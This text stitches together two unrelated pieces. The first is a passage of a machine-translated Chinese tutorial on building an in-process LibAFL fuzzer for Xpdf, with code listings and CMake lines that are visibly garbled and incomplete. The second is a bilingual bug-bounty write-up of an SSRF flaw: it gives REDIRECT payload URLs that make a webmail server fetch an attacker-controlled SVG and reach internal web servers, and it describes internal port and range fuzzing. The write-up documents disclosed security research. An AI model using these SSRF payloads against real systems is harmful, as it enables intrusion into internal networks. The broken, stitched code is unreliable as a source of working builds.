  if (!ok || argc < 2 || argc > 3 || printVersion || printHelp) {
    fprintf(stderr, "pdftotext version %s\n", xpdfVersion);
    fprintf(stderr, "%s\n", xpdfCopyright);
    if (!printVersion) {
      printUsage("pdftotext", "<PDF-file> [<text-file>]", argDesc);
    goto err0;
  fileName = new GString(argv[1]);

  // read config file
  globalParams = new GlobalParams(cfgFileName);



在重新编译 Xpdf 和我们的 fuzzer 之后,我们看到了相当大的速度提升!对输出进行随机抽样表明我们处于 2 倍加速的范围内,这正是我们所希望的。

cargo make clean
cargo build --release
taskset -c 6 ../target/release/exercise-one-solution -c lto
[Stats #0] clients: 1, corpus: 615, objectives: 0, executions: 567834, exec/sec: 1961
[Stats #0] clients: 1, corpus: 615, objectives: 0, executions: 567834, exec/sec: 2040
[Testcase #0] clients: 1, corpus: 616, objectives: 0, executions: 570189, exec/sec: 2261
[Stats #0] clients: 1, corpus: 616, objectives: 0, executions: 571831, exec/sec: 2270
[Stats #0] clients: 1, corpus: 616, objectives: 0, executions: 575641, exec/sec: 2203
[Stats #0] clients: 1, corpus: 616, objectives: 0, executions: 575641, exec/sec: 2185

但是等等,还有更多!我们可以从 pdftotext.cc 的 main 函数中去掉一些更多的代码,并且运行得更快。第一条注释和它下面的第一行代码让我们知道我们正在从磁盘读取文件,所以让我们摆脱它。

  // read config file
  globalParams = new GlobalParams(cfgFileName);
  if (textEncName[0]) {
  if (textEOL[0]) {
    if (!globalParams->setTextEOL(textEOL)) {
      fprintf(stderr, "Bad '-eol' value on command line\n");
  if (noPageBreaks) {
  if (quiet) {
  // get mapping to output encoding
  if (!(uMap = globalParams->getTextEncoding())) {
    error(-1, "Couldn't get text encoding");
    delete fileName;
    goto err1;

还有这段代码将转换后的 pdf 写入其文本文件。让我们也把它放在阳光下。

  // write text file
  textOut = new TextOutputDev(textFileName->getCString(),
			      physLayout, rawOrder, htmlMeta);
  if (textOut->isOk()) {
    doc->displayPages(textOut, firstPage, lastPage, 72, 72, 0,
		      gFalse, gTrue, gFalse);
  } else {
    delete textOut;
    exitCode = 2;
    goto err3;
  delete textOut;

可以清理 main 的其余部分,以删除与 PDFDoc 及其方法没有直接关系的任何内容,但我们现在将不做任何处理。重新编译 Xpdf 后,我们可以再次启动模糊器。

[Stats #0] clients: 1, corpus: 438, objectives: 0, executions: 54787, exec/sec: 3378
[Testcase #0] clients: 1, corpus: 439, objectives: 0, executions: 55233, exec/sec: 3430
[Stats #0] clients: 1, corpus: 439, objectives: 0, executions: 55233, exec/sec: 3478
[Testcase #0] clients: 1, corpus: 440, objectives: 0, executions: 55386, exec/sec: 3528
[Stats #0] clients: 1, corpus: 440, objectives: 0, executions: 55386, exec/sec: 3575
[Testcase #0] clients: 1, corpus: 441, objectives: 0, executions: 55458, exec/sec: 3621
[Stats #0] clients: 1, corpus: 441, objectives: 0, executions: 55733, exec/sec: 3581
[Stats #0] clients: 1, corpus: 441, objectives: 0, executions: 55733, exec/sec: 3542

还不错!除了初始分析之外,无需太多努力即可实现大约 3 倍的加速。事情现在看起来很不错,但我们可能会通过更换我们的执行程序做得更好,我们接下来会看看。

第 3 步:执行者交换

我们寻找@gamozolabs一直在谈论的难以捉摸的“性能”的最后一步是将我们的 ForkserverExecutor 换成 InProcessExecutor。进程内模糊器的结构将与我们目前使用的结构有很大不同。我们当前的模糊器是一个独立的二进制文件,它一遍又一遍地执行外部程序。在接下来的部分中,我们将把这种范式抛诸脑后。

我们的攻击计划是创建一个模糊目标(harness.cc)和一个 LibAFL 支持的编译器(compiler.rs),我们将用它来编译模糊目标。我们还将修改我们的独立模糊器,使其成为一个静态库,我们将使用我们的编译器链接到我们的模糊目标。

这些是我们将要更换执行器的大致步骤。正如本文开头所提到的,这通常会显着提高 fuzzer 的性能。让我们看看这是否适用于我们。

静态编译 Xpdf

我们将通过静态编译 Xpdf 开始我们的交换。我们从这里开始,因为这确实是成败的步骤。如果我们不能将 Xpdf 静态编译为一个库,我们可能最好探索其他替代方案,例如持久模式模糊测试。静态编译的 xpdf 库最终将链接到我们的模糊测试目标,因此我们可以练习我们对模糊测试感兴趣的代码。


不幸的是,他们只提供版本 4.02,一个比我们的目标更新的主要版本。这意味着我们需要自己构建 Xpdf 3.02。嗯,有点,我们仍然可以严重依赖 libxpdf 存储库中完成的工作,它只需要我们做一些额外的工作。

制作成 CMake

如果我们在 4.0 版之后的任何时候检查 Xpdf 存储库,我们可以看到他们将构建系统从 Make 移到了 CMake。这是一个障碍(至少对我来说,如果你知道一种更简单的转换方法,我全神贯注),但不是一个巨大的障碍。我们可以简单地从 4.0+ 存储库中获取 CMake 相关文件并将它们塞入我们本地的 3.02 存储库中。

我们要查找的是 4.0 文件夹中所有与 CMake 相关的文件。我们需要首先找到所有这些文件并将它们放在我们 3.02 文件夹中相同的相对位置。由于数量太少,我只是手动完成了mv它们。

find xpdf | grep cmake


将这些文件放在 3.02 文件夹中后,我们可以尝试使用 CMake 进行构建。我们将使用 CMake 推荐的“out of source”构建策略,这意味着我们将在与目标无关的目录中构建,并为 cmake 提供 CMakeLists.txt 的位置作为参数。


mkdir build 
cd build
cmake ../xpdf

当我们这样做时,会出现一堆错误,主要是关于尝试编译不存在的文件。为了让事情正常工作,我们只需要迭代地构建/错误输出/修改 CMake 文件,直到我们可以构建我们的目标。最终,需要进行以下更改才能使一切正常。



15add_library(fofi_objs OBJECT
16  FoFiBase.cc
17  FoFiEncodings.cc
18  FoFiIdentifier.cc
19  FoFiTrueType.cc
20  FoFiType1.cc
21  FoFiType1C.cc

lt;TARGET_OBJECTS:fofi_objs> 26)


28add_library(xpdf_objs OBJECT
29  AcroForm.cc
30  Annot.cc
31  Array.cc
32  BuiltinFont.cc
33  BuiltinFontTables.cc
34  Catalog.cc
35  CharCodeToUnicode.cc
36  CMap.cc
38  Decrypt.cc
39  Dict.cc
40  Error.cc
41  FontEncodingTables.cc
42  Form.cc
43  Function.cc
44  Gfx.cc
45  GfxFont.cc
46  GfxState.cc
47  GlobalParams.cc
48  JArithmeticDecoder.cc
49  JBIG2Stream.cc
50  JPXStream.cc
51  Lexer.cc
52  Link.cc
53  NameToCharCode.cc
54  Object.cc
55  OptionalContent.cc
56  Outline.cc
57  OutputDev.cc
58  Page.cc
59  Parser.cc
60  PDF417Barcode.cc
61  PDFDoc.cc
62  PDFDocEncoding.cc
63  PSTokenizer.cc
64  SecurityHandler.cc
65  Stream.cc
66  TextString.cc
67  UnicodeMap.cc
68  UnicodeRemapping.cc
69  UnicodeTypeTable.cc
70  UTF8.cc
71  XFAForm.cc
72  XRef.cc
73  Zoox.cc
77  set(SPLASH_LIB splash)

lt;TARGET_OBJECTS:splash_objs>) 79 set(SPLASH_OUTPUT_DEV_SRC "SplashOutputDev.cc") 80else() 81 set(SPLASH_LIB "") 82 set(SPLASH_OBECTS "") 83 set(SPLASH_OUTPUT_DEV_SRC "") 84endif() 85 86add_library(xpdf STATIC 87

lt;TARGET_OBJECTS:xpdf_objs> 88

lt;TARGET_OBJECTS:goo_objs> 89

lt;TARGET_OBJECTS:fofi_objs> 90 ${SPLASH_OBECTS} 91



lt;TARGET_OBJECTS:${FREETYPE_LIBRARY}> 94 PreScanOutputDev.cc 95 PSOutputDev.cc 96 ${SPLASH_OUTPUT_DEV_SRC} 97 TextOutputDev.cc 98 HTMLGen.cc 99 WebFont.cc 100 ImageOutputDev.cc 101)

现在,我们应该能够使用 afl++ 静态编译 xpdf。


cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_C_COMPILER=afl-clang-lto -DCMAKE_CXX_COMPILER=afl-clang-lto++ ../xpdf/


ls -al */*.a 

-rw-rw-r-- 1 epi epi   417288 Nov 13 20:02 goo/libgoo.a
-rw-rw-r-- 1 epi epi   898772 Nov 13 20:02 fofi/libfofi.a
-rw-rw-r-- 1 epi epi   964732 Nov 13 20:03 splash/libsplash.a
-rw-rw-r-- 1 epi epi 12133702 Nov 13 20:03 xpdf/libxpdf.a

不是太寒酸!现在我们有了一个可以在 fuzzing 时使用的检测静态库(稍后我们将替换我们自己的 afl 编译器)。在我们开始修改我们的 fuzzer 之前,让我们编写代码将使用我们新编译的库(也就是我们的 fuzz 目标/线束/我们最终会进行 fuzz 的代码)……继续前进!


首先,我们可以排除一些命名法。我们将要写的是(根据我的经验)通常称为线束。在 libFuzzer 的文档中,它被称为模糊目标。它们是一样的东西,但线束更容易打字,所以我们会坚持下去。

线束只是一个函数,它接受一个字节数组和字节数组的大小作为参数,然后使用它们来调用被测目标库。在构建线束(从libFuzzer 文档修改)时,我们需要记住以下几点:

  • fuzzing 引擎将在同一进程中使用不同的输入多次执行 fuzz 目标。
  • 它不能在任何输入上 exit() 。
  • 它必须很快。尽量避免三次或更高的复杂性、日志记录或过多的内存消耗。

因为我们的线束将在同一个进程中一遍又一遍地执行,所以我们需要确保我们不会泄漏内存或到达调用exit. 我们还希望将代码量限制为仅执行我们希望模糊器采用的路径所绝对必要的代码量。由于我们已经有一个我们知道存在漏洞的驱动程序 ( pdftotext),我们可以简单地查看一下我们的线束应该做什么。

我们在这里的目标是保留原始程序的语义,但撕掉它的内脏以使其更容易模糊(来自@h0mbre 的粗引用)。我们主要对在PDFDoc实例化对象上创建或调用方法的代码感兴趣。下面是我们需要在我们的线束中复制该行为的全部内容。


  doc = new PDFDoc(fileName, ownerPW, userPW);

  if (!doc->isOk()) {

  if (!doc->okToCopy()) {

  if (lastPage < 1 || lastPage > doc->getNumPages()) {
    lastPage = doc->getNumPages();

  delete doc;

提取出我们关心的代码后,就可以编写我们的线束了。LLVMFuzzerTestOneInput下面看到的函数签名是许多(全部?)主要模糊测试框架支持的函数签名。这意味着我们可以编写一个线束并将其与 libFuzzer、AFL++、Honggfuzz 等一起使用……

#include <fstream>
#include <iostream>
#include <stdint.h>
#include "PDFDoc.h"
#include "goo/gtypes.h"
#include "XRef.h"

extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
    int lastPage = 0;

    GString *user_pw = NULL;
    GString *owner_pw = NULL;
    GString *filename = NULL;

    Object obj;

    // stream is cleaned up when doc's destructor fires
    MemStream *stream = new MemStream((char *)data, 0, size, &obj);

    PDFDoc *doc = new PDFDoc(stream, owner_pw, user_pw);

    if (doc->isOk() && doc->okToCopy()) {
        lastPage = doc->getNumPages();

    if (doc) { delete doc; }

    return 0;



我们还需要对 xpdf 代码进行一项小的修改。具体在xpdf/goo/gmem.cc. 回想一下上面的代码,线束中/使用的代码不能exit来自任何输入。好吧,恰好有一个我们的模糊器将执行的代码路径导致调用exit(1).

我们可以通过将 exit 的调用替换为 的调用来解决此问题std::abort()。调用 abort 将允许 fuzzer 捕捉到崩溃并重新启动,而调用 exit 只会让我们的努力白费。

164  if (objSize <= 0 || nObjs < 0 || nObjs >= INT_MAX / objSize) {
166    throw GMemException();
168    fprintf(stderr, "nObjs: %d objSize\n", nObjs, objSize);
169    fprintf(stderr, "Bogus memory allocation size\n");
170    // exit(1);
171    std::abort();
173  }
174  return gmalloc(n);
177void *greallocn(void *p, int nObjs, int objSize) GMEM_EXCEP {
178  int n;
180  if (nObjs == 0) {
181    if (p) {
182      gfree(p);
183    }
184    return NULL;
185  }
186  n = nObjs * objSize;
187  if (objSize <= 0 || nObjs < 0 || nObjs >= INT_MAX / objSize) {
189    throw GMemException();
191    fprintf(stderr, "p: %p nObjs: %d objSize %d\n", p, nObjs, objSize);
192    fprintf(stderr, "Bogus memory allocation size\n");
193    // exit(1);
194    std::abort();



我们需要添加libafl_cc作为项目依赖项,以及libafl_targets. 我们选择使用文件系统上的文件夹,以便我们可以合并 LibAFL 团队最近所做的一些较新的更改。具体来说,出于本文的目的,我们提交 23f02dae12bfa49dbcb5157aee6e0c6ddaeddcd0。我们还需要将 crate 类型更改为静态库。


# commit 23f02dae12bfa49dbcb5157aee6e0c6ddaeddcd0
libafl = { path = "../LibAFL/libafl" }
libafl_cc = { path = "../LibAFL/libafl_cc" }
libafl_targets = { path = "../LibAFL/libafl_targets" , features = ["libfuzzer", "sancov_pcguard_hitcounts"] }

name = "exerciseone"
crate-type = ["staticlib"]

此外,我们的编译器将是一个可执行的二进制文件。我们可以使用 rust 的bin文件夹约定来说明文件src/bin夹中的任何文件都应该编译为独立的可执行文件。


很酷,现在我们可以添加编译器代码了。如果您查看 LibAFL 存储库中的模糊器示例,它们中的大多数都使用相同的编译器代码。为清楚起见,下面显示的内容略有修改。


use libafl_cc::{ClangWrapper, CompilerWrapper};
use std::env;

pub fn main() {
    let cwd = env::current_dir().unwrap();
    let args: Vec<String> = env::args().collect();

    let mut cc = ClangWrapper::new();

    let is_cpp = env::current_exe().unwrap().ends_with("compiler_pp");

    if let Some(code) = cc
        .expect("Failed to parse the command line")
        .link_staticlib(&cwd, "exerciseone")
        .expect("Failed to run the wrapped compiler")

关于上述代码的一些注意事项: –"compiler_pp"将是我们的 c++ 编译器包装器的名称 – 我们将我们的 crate 静态库的名称作为参数传递给.link_staticlib调用 –"-fsanitize-coverage=trace-pc-guard"此处讨论的 SanitizerCoverage 选项,但基本上允许我们轨道边缘覆盖

好的,最后,我们只需要添加我们的 c++ 编译器,它会简单地调用上面的编译器代码。


pub mod compiler;

fn main() {

甜的!我们有 ac 和 cpp 编译器,由 clang 支持,它将基于 SanitizerCoverage 的覆盖检测添加到它编译的任何内容中。





之后,我们可以开始对模糊器进行修改。与 binary->library switch 主题保持一致,我们需要重命名 main 函数并添加no_mangle属性。no_mangle 属性指示 rustc 按原样保留此符号的名称,否则它最终可能看起来像 _ZN6afl_main17heb3ea72ba341fa07E。

fn libafl_main() -> Result<(), Error> {


接下来,我们需要更新观察边缘覆盖的方式。在基于 ForkserverExecutor 的 fuzzer 中,我们__AFL_SHM_ID自动从环境变量中获得了一个指向共享内存的指针,但是由于这个 fuzzer 现在使用 InProcessExecutor,我们需要使用EDGES_MAP来自libafl_targetscrate 的覆盖模块。

当我们用于afl-clang-[fast|lto]检测时,编译器插入了 __AFL_SHM_ID 指向的边缘覆盖图,我们可以使用该变量来获取指向该图的指针。这一次,我们使用libafl_cc,它使用 SanitizerCoverage 后端。最后,__AFL_SHM_ID环境变量不会被填充,所以我们需要使用libafl_targets暴露的EDGES_MAP。

特别感谢来自 Awesome Fuzzing Discord 服务器的 @toka 花时间帮助我/解释这个

let edges = unsafe { &mut EDGES_MAP[0..MAX_EDGES_NUM] };
let edges_observer = HitcountsMapObserver::new(StdMapObserver::new("edges", edges));

由于我们使用的是 EDGES_MAP,我们不能使用我们自己的地图大小定义,所以我们将更新我们的 Objective_state。

let objective_state = MapFeedbackState::new("timeout_edges", unsafe { EDGES_MAP.len() });


因为我们将在与 fuzzer 相同的进程空间中运行线束,所以线束打印到 stdout/err 的任何内容都将出现在 fuzzer 中。我们不希望看到一堆垃圾混杂在我们的模糊器统计信息中,因此我们将旧的 SimpleStats 组件替换为MultiMonitor。该Monitor组件是旧 Stats 组件的新名称。Stats 和 State 组件的名称过于相似,所以现在我们使用 Monitor 组件代替。

MultiMonitor 将显示累积和每个客户端的统计信息。它使用 LibAFL 的低级消息传递协议 (LLMP) 在代理和客户端之间进行通信。代理在第一次运行模糊器时产生,并且在代理处于活动状态时启动的任何模糊器进程都被视为客户端。值得注意的是,在第一次客户端连接到代理时,输出将显示有 2 个活动客户端。

当被问及这种行为时,@domenukk 是这样说的:

第 0 个客户端是打开网络套接字并侦听其他客户端和潜在代理的客户端。从 llmp 的角度来看,它仍然是一个客户端,因此它或多或少是一个实现细节。

实际代码与我们要替换的 SimpleStats 一样简单。

let monitor = MultiMonitor::new(|s| {
    println!("{}", s);

但是随着这种变化,我们的代理实例打印我们的统计信息,而每个客户端的 stdout/err 将打印到他们各自的终端。

broker terminal

[LibAFL/libafl/src/bolts/llmp.rs:600] "We're the broker" = "We're the broker"
Doing broker things. Run this tool again to start fuzzing in a client.
[LibAFL/libafl/src/bolts/llmp.rs:2187] "New connection" = "New connection"
[LibAFL/libafl/src/bolts/llmp.rs:2187] addr =
[LibAFL/libafl/src/bolts/llmp.rs:2187] stream.peer_addr().unwrap() =
[Stats       #1]  (GLOBAL) clients: 2, corpus: 0, objectives: 0, executions: 0, exec/sec: 0
                  (CLIENT) corpus: 0, objectives: 0, executions: 0, exec/sec: 0, edges: 299/17128 (1%)
[4:39 PM]
client terminal

We're the client (internal port already bound by broker, Os {
    code: 98,
    kind: AddrInUse,
    message: "Address already in use",
Connected to port 1337
[LibAFL/libafl/src/events/llmp.rs:833] "Spawning next client (id {})" = "Spawning next client (id {})"
[LibAFL/libafl/src/events/llmp.rs:833] ctr = 0


在我们的 fuzzer 的 forkserver 版本中,我们使用了 SimpleEventManager。这一次,我们需要一个LlmpRestartingEventManager。LlmpRestartingEventManager 执行与 SimpleEventManager 相同的基本功能,但也可以重新启动其关联的模糊器,在单独的执行之间保存模糊器的状态。这意味着每次孩子崩溃或超时时,LlmpRestartingEventManager 将产生一个新进程并继续进行模糊测试。在对setup_restarting_mgr_std的调用中,我们传入MultiMonitor、代理将侦听的端口 (1337) 和EventConfig::AlwaysUnique. LlmpRestartingEventManager 仅使用 EventConfig 来通过配置区分各个模糊器。

我们想要重新启动行为的原因之一是从根本上“清除掉”线束的 1000 次旧执行中的“碎片”,因此我们可以从头开始。

let (state, mut mgr) = match setup_restarting_mgr_std(monitor, 1337, EventConfig::AlwaysUnique)
    Ok(res) => res,
    Err(err) => match err {
        Error::ShuttingDown => {
            return Ok(());
        _ => {
            panic!("Failed to setup the restarting manager: {}", err);


接下来,我们需要从 EventManager 中获取 State。在初始传递时,setup_restarting_mgr_std从上面返回(None, LlmpRestartingEventManager)。在每次连续执行时(即在模糊器重新启动时),它返回保存在共享内存中的先前运行的状态。下面的代码通过提供默认的 StdState 来处理初始 None 值。第一次重启后,我们将简单地解开Some(StdState)调用 setup_restarting_mgr_std的返回值。

let mut state = state.unwrap_or_else(|| {
        // random number generator with a time-based seed
        // States of the feedbacks that store the data related to the feedbacks that should be
        // persisted in the State.
        tuple_list!(feedback_state, objective_state),


下面的代码是一个 Rust 闭包。它负责接受一些被 fuzzer 改变的字节,并将它们发送到我们LLVMFuzzerTestOneInputharness.cc.

let mut harness = |input: &BytesInput| {
    let target = input.target_bytes();
    let buffer = target.as_slice();


这里我们有小时的组件,InProcessExecutor!我们需要传入所有组件,然后将其包装在TimeoutExecutor 中,以便我们可以保持与之前相同的超时行为。

let in_proc_executor = InProcessExecutor::new(
    &mut harness,
    tuple_list!(edges_observer, time_observer),
    &mut fuzzer,
    &mut state,
    &mut mgr,

let mut executor = TimeoutExecutor::new(in_proc_executor, timeout);


最后,我们有 Fuzzer 组件。不是fuzz_loop再次使用该方法,而是永远循环。我们将改为使用fuzz_loop_for,它在继续之前只会运行 10,000 次模糊迭代。这将允许 fuzzer 退出并重新启动,让我们每隔一段时间就清理一次。

由于在重启场景中使用这个 fuzz_loop_for 在退出前只运行 10,000 次迭代,我们需要确保我们调用on_restart并将其传递给我们当前的状态。这样,状态将在下一个重新生成的模糊器过程中可用。

    .fuzz_loop_for(&mut stages, &mut executor, &mut state, &mut mgr, 10000)

mgr.on_restart(&mut state).unwrap();


有了所有必要的更改,我们就可以编写使一切正常的粘合剂。我最近遇到了货物制造项目,它非常强大。我们将在这里使用它来管理我们的构建和清理步骤。我们使用这个项目的主要动机build.rs是 Rust 的构建脚本没有类似的清理脚本。在过去,我通常只是用 Makefile 来扩充我的构建脚本,但现在没有了!现在,它Makefile.toml或破产。

在高层次上,我们可以运行cargo make rebuild以清理所有内容,构建编译器,然后使用编译器编译 xpdf 和我们的工具。

练习 1/Makefile.toml

dependencies = ["cargo-clean", "afl-clean", "clean-xpdf"]

script = '''
rm -rf .cur_input* timeouts fuzzer fuzzer.o libexerciseone.a

cwd = "xpdf"
script = """
make --silent clean
rm -rf built-with-* ../build/*

command = "cargo"
args = ["clean"]

dependencies = ["afl-clean", "clean-xpdf", "build-compilers", "build-xpdf", "build-fuzzer"]

script = """
cargo build --release
cp -f ../target/release/libexerciseone.a .

cwd = "build"
script = """
cmake ../xpdf -DCMAKE_BUILD_TYPE=Release -DCMAKE_C_COMPILER=$(pwd)/../../target/release/compiler -DCMAKE_CXX_COMPILER=$(pwd)/../../target/release/compiler_pp

script = """
../target/release/compiler_pp -I xpdf/goo -I xpdf/fofi -I xpdf/splash -I xpdf/xpdf -I xpdf -o fuzzer harness.cc build/*/*.a -lm -ldl -lpthread -lstdc++ -lgcc -lutil -lrt

在我们运行之后cargo run rebuild,我们fuzzerexercise-1目录中留下了二进制文件。


ls -al fuzzer

-rwxrwxr-x  1 epi epi 24446960 Nov 13 20:03 fuzzer



窗口 1:经纪人


[LibAFL/libafl/src/bolts/llmp.rs:600] "We're the broker" = "We're the broker"
Doing broker things. Run this tool again to start fuzzing in a client.

窗口 1:客户端

taskset -c 6 ./fuzzer

We're the client (internal port already bound by broker, Os {
    code: 98,
    kind: AddrInUse,
    message: "Address already in use",
Connected to port 1337
[LibAFL/libafl/src/events/llmp.rs:833] "Spawning next client (id {})" = "Spawning next client (id {})"
[LibAFL/libafl/src/events/llmp.rs:833] ctr = 0
Awaiting safe_to_unmap_blocking
We're a client, let's fuzz :)
First run. Let's set it all up
Loading file "./corpus/sample.pdf" ...
We imported 1 inputs from disk.


[Stats       #1]  (GLOBAL) clients: 2, corpus: 454, objectives: 7, executions: 195316, exec/sec: 13500
                  (CLIENT) corpus: 454, objectives: 7, executions: 195316, exec/sec: 13500, timeout_edges: 619/17129 (3%), edges: 614/17129 (3%)
[Stats       #1]  (GLOBAL) clients: 2, corpus: 454, objectives: 7, executions: 195316, exec/sec: 13500
                  (CLIENT) corpus: 454, objectives: 7, executions: 195316, exec/sec: 13500, timeout_edges: 619/17129 (3%), edges: 614/17129 (3%)
[Testcase    #1]  (GLOBAL) clients: 2, corpus: 455, objectives: 7, executions: 196431, exec/sec: 13569
                  (CLIENT) corpus: 455, objectives: 7, executions: 196431, exec/sec: 13635, timeout_edges: 619/17129 (3%), edges: 614/17129 (3%)
[Stats       #1]  (GLOBAL) clients: 2, corpus: 455, objectives: 7, executions: 196431, exec/sec: 13087
                  (CLIENT) corpus: 455, objectives: 7, executions: 196431, exec/sec: 12573, timeout_edges: 619/17129 (3%), edges: 614/17129 (3%)
[Stats       #1]  (GLOBAL) clients: 2, corpus: 455, objectives: 7, executions: 196431, exec/sec: 12092
                  (CLIENT) corpus: 455, objectives: 7, executions: 196431, exec/sec: 11641, timeout_edges: 619/17129 (3%), edges: 614/17129 (3%)

好的!我们已经将我们原来的 fuzzer 加速了一个数量级,无论是给予还是接受。你可以从输出中看到,我的机器上有很大的变化。更酷的是现在我们可以为机器上的每个可用内核运行另一个模糊器实例。

这就是这篇文章。在下一篇中,我们将解决 Fuzzing101 中的练习 #2!


  1. Fuzzing101
  2. AFL++
  3. 自由职业者联盟
  4. fuzzing-101-solutions 存储库
  5. libxpdf
  6. libFuzzer 文档
  7. SanitizerCoverage – trace-pc-guard

Simple SSRF Allows Access To Internal Assets

Brief Description 简介

While taking a look at one of the host targets at Synack everything seemed to be a dead end as two hosts were only available on scope, and one of them was hosting a web server. The web server was a login page for mailing services, but by doing a nslookup with the host’s IP, it was possible to gather more information once the domain was being identified.

当看到 Synack 的一个主机目标时,一切似乎都走进了死胡同,因为有两个主机只能在作用域上使用,而其中一个主机承载了一个 web 服务器。Web 服务器是邮件服务的登录页面,但是通过对主机的 IP 进行 nslookup,一旦确定了域名,就可以收集更多的信息。

Reconnaissance Steps 侦察步骤

Once the host’s domain was identified, there were several dead ends after some common content discovery techniques and looking at endpoints in JavaScript files. Despite facing dead ends, there was a cgi file called fetch.cgi which was returning a 500 HTTP status code when being visited, then by the suspicious name of the file parameter brute force was performed.

一旦确定了主机的域名,在一些常见的内容发现技术和查看 JavaScript 文件中的端点之后,就会出现几个死胡同。尽管面临死胡同,还是有一个名为 fetch.cgi 的 cgi 文件,当被访问时返回一个500 HTTP状态码,然后通过文件参数 brute force 的可疑名称执行。

While performing parameter brute force, tools such as x8, arjun, and param-miner were used but no helpful results were found. Therefore, by using ffuf with a custom wordlist, the parameter REDIRECT was found after performing parameter fuzzing. The following command was used along with a custom wordlist:

在执行参数暴力破解时,使用了 x8、 arjun 和 param-miner 等工具,但没有找到有用的结果。因此,通过在自定义字列表中使用 ffuf,可以在执行参数 fuzzing 之后找到参数 REDIRECT。下面的命令与自定义单词列表一起使用:

When using ffuf for this matter, to get better results, do not forget to filter words according to the results by using the flag -fw. After performing parameter fuzzing and finding the parameter REDIRECT, the request was sent to the repeater tab to analyze it further by fetching an external file from my VPS which ended up with a 200 status code in the HTTP response.

在使用 ffuf 时,为了获得更好的结果,不要忘记使用 flag-fw 根据结果过滤单词。在执行参数 fuzzing 并找到参数 REDIRECT 之后,请求被发送到 repeater 选项卡,通过从我的 VPS 获取一个外部文件进一步分析它,该文件在 HTTP 响应中以200状态码结束。


By getting a HTTP request to my VPS, this simply proves the existence of the flaw, but still there’s the task to prove impact.

通过向我的 VPS 提供一个 HTTP 请求,这只是证明了这个缺陷的存在,但是仍然有一个任务需要证明其影响。

Exploitation and Impact 开发及影响

As SSRF is not a vulnerability that I may know well, gathering resources from the internet was helpful. By gathering some resources there were the following options.


Internal Port Scanning:
By reading the article “SSRF – Server Side Request Forgery (Types and ways to exploit it) Part-1” by @Madrobot_ it was possible to run a port scan to recognize other internal services. For this process, the tool ffuf was handy along with a list of all ports. Unfortunately, there were no more services found. The following command was used.

内部端口扫描: 通过阅读@Madrobot _ 的文章“ SSRF-Server Side Request Forgery (Types and ways to exploit) Part-1”,可以运行端口扫描来识别其他内部服务。对于这个过程,ffuf 工具以及所有端口的列表非常方便。不幸的是,没有找到更多的服务。使用了以下命令。


Reflected XSS:

反射的 XSS:

It’s possible to obtain reflected XSS by exploiting the SSRF flaw by fetching resources from an external URL. Unfortunately, Reflected XSS is not accepted for host targets in Synack, but it was included as proof of concept of the SSRF flaw in the report.

通过从外部 URL 获取资源,可以利用 SSRF 缺陷获得反射的 XSS。不幸的是,反射 XSS 不被接受为主机目标在 Synack,但它包括作为证明的概念 SSRF 缺陷的报告。

  • https://webmail.domain.vi/fetch.cgi?REDIRECT=http://controlled-server/xss.svg


Fetching Internal Unaccessible Web Servers

获取内部无法访问的 Web 服务器

As both methods explained below did not show enough impact. It’s possible to fetch internal web servers by fuzzing internal ranges as SSRF payloads, the usage of a list of ranges gathered by using Hurricane Electric Services was handy, as also the usage of best-dns-wordlist.txt wordlist from Assetnote. The usage of ffuf was handy for this task with the following commands:

正如下面解释的两种方法都没有显示出足够的影响力。通过模糊内部范围作为 SSRF 有效载荷来获取内部 web 服务器是可能的,使用飓风电子服务收集的范围列表是很方便的,同时使用 Assetnote 的 best-dns-wordlist.txt 文字列表也很方便。通过以下命令,使用 ffuf 可以很方便地完成这个任务:

After performing fuzzing, another nginx and IIS server were found from one internal IP and another internal domain that were fuzzed. I did not proceed with further content discovery from the internal servers as I end up reporting the flaw again. The following proof of concept of internal web servers was found:

在执行模糊化之后,从一个内部 IP 和另一个内部域中发现了另一个 nginx 和 IIS 服务器。我没有继续从内部服务器进行进一步的内容发现,因为我最终再次报告了这个缺陷。以下是内部网络服务器概念的证明:

nginx server:


  • https://webmail.domain.vi/fetch.cgi?REDIRECT=http://internal-ip/


IIS server:

IIS 服务器:

  • https://webmail.domain.vi/fetch.cgi?REDIRECT=http://skypeav.domain.vi/


After a few days of back to back with Vuln Ops, the vulnerability was accepted and rewarded.

经过几天的背靠背与 Vuln Ops,弱点是接受和奖励。


TakeawaysFuzzing can be useful when being used correctly, which in this case helped discover internal web servers parameters. Also, being able to collect information from the server such as IP ranges and possible domains are handy when exploiting the flaw.

Fuzzing 在正确使用时非常有用,在这种情况下,它有助于发现内部 web 服务器参数。此外,能够从服务器收集信息,如 IP 范围和可能的域是方便的时候,利用该漏洞。

Thanks for making it to the end! 谢谢你坚持到了最后

If you want to chat or just connect, feel free to shoot a direct message on Twitter.

如果你想聊天或者仅仅是联系,可以在 Twitter 上直接发送信息。